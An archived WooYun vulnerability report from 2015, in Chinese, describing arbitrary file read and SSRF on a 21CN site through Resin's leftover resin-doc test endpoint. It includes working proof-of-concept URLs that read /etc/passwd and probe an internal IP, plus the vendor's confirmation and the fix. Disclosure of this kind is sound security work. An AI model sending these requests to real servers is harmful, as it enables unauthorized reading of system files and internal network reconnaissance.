破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

21CN某站点站点任意文件读取和SSRF漏洞可探测内网(resin成功利用案例)

编号142017
Urlhttp://www.wooyun.org/bug.php?action=view&id=142017
漏洞状态厂商已经确认
漏洞标题21CN某站点站点任意文件读取和SSRF漏洞可探测内网(resin成功利用案例)
漏洞类型任意文件遍历/下载
厂商世纪龙信息网络有限责任公司
白帽子小不点
提交日期2015-09-18 17:42:00
公开日期2015-11-02 18:28:00
修复时间(not set)
确认时间2015-09-18 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank15
漏洞简介
rt
漏洞细节

http://dist.21cn.com:8088/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd

QQ图片20150918171546.png


可读取各种配置文件
内网ip地址

QQ图片20150918132427.png


nginx配置

QQ图片20150918171040.png


SSRF漏洞可探测内网

QQ图片20150918172051.png


http://dist.21cn.com:8088/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.29.5.24

QQ图片20150918170626.png


POC

http://dist.21cn.com:8088/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd

QQ图片20150918171546.png


可读取各种配置文件
内网ip地址

QQ图片20150918132427.png


nginx配置

QQ图片20150918171040.png


SSRF漏洞可探测内网

QQ图片20150918172051.png


http://dist.21cn.com:8088/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.29.5.24

QQ图片20150918170626.png


修复方案

删除resin-doc

状态信息 2015-09-18: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经确认,细节仅向厂商公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开
厂商回复感谢您对我们业务安全的关注,根据您的报告,问题已着手处理,谢谢。
回应信息危害等级:高漏洞Rank:15 确认时间:2015-09-18 18:27
Showing 1-3 of 3 items.
评论内容评论人点赞数评论时间

@小不点 啊,我知道是哪个洞了

疯狗02015-09-18 19:03:00

@疯狗 让狗哥见笑了,请多多指教

小不点02015-09-18 17:55:00

成功了,厉害!

疯狗02015-09-18 17:42:00